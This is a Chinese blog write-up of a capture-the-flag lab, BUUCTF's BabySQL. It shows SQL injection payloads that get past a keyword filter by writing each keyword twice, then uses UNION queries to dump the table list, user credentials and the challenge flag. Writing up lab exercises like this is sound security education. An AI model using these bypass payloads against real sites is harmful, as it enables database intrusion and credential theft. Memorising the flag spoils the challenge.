BUUCTF [极客大挑战 2019]BabySQL

白塔河冲浪手

已于 2022-04-03 10:58:37 修改

阅读量866

点赞数

分类专栏：第二周刷题记录3.14-3.20 文章标签： sql 数据库其他

于 2022-03-19 10:44:54 首次发布

本文链接：https://blog.csdn.net/m0_63253040/article/details/123590008

版权

SQL注入双写绕过数据库爆破字段探测信息获取

关键词由CSDN通过智能技术生成

第二周刷题记录3.14-3.20 专栏收录该内容

7 篇文章 0 订阅

订阅专栏

进入环境是一个登入页面，提示有过滤

通过测试，发现万能密码登录过滤啦or，用||替代

然后开始sql注入爆数据库

先爆字段数,or和by被过滤了要双写绕过

admin' oorrder bbyy 1#
密码随便

3的时候正常回显，4的时候报错，说明表里有3个字段

然后看回显位置

这里union,select都被过滤，双写绕过，先看看回显

check.php?username=admin&password=' ununionion seselectlect 1,2,3 %23

爆数据库:geek

爆数据表:

check.php?username=admin&password=' ununionion seselectlect 1,2,group_concat(table_name) frfromom infoorrmation_schema.tables whwhereere table_schema='geek' %23

爆字段:

查数据:

check.php?username=admin&password=' ununionion seselectlect 1,2,group_concat(id,username,passwoorrd) frfromom geek.b4bsql %23


Your password is '1cl4yi_want_to_play_2077,2sqlsql_injection_is_so_fun,3porndo_you_know_pornhub,4gitgithub_is_different_from_pornhub,5Stopyou_found_flag_so_stop,6badguyi_told_you_to_stop,7hackerhack_by_cl4y,8flagflag{bb35b99f-fe37-4f47-9c77-9d8c45395267}'

就出来啦

这题很多双写绕过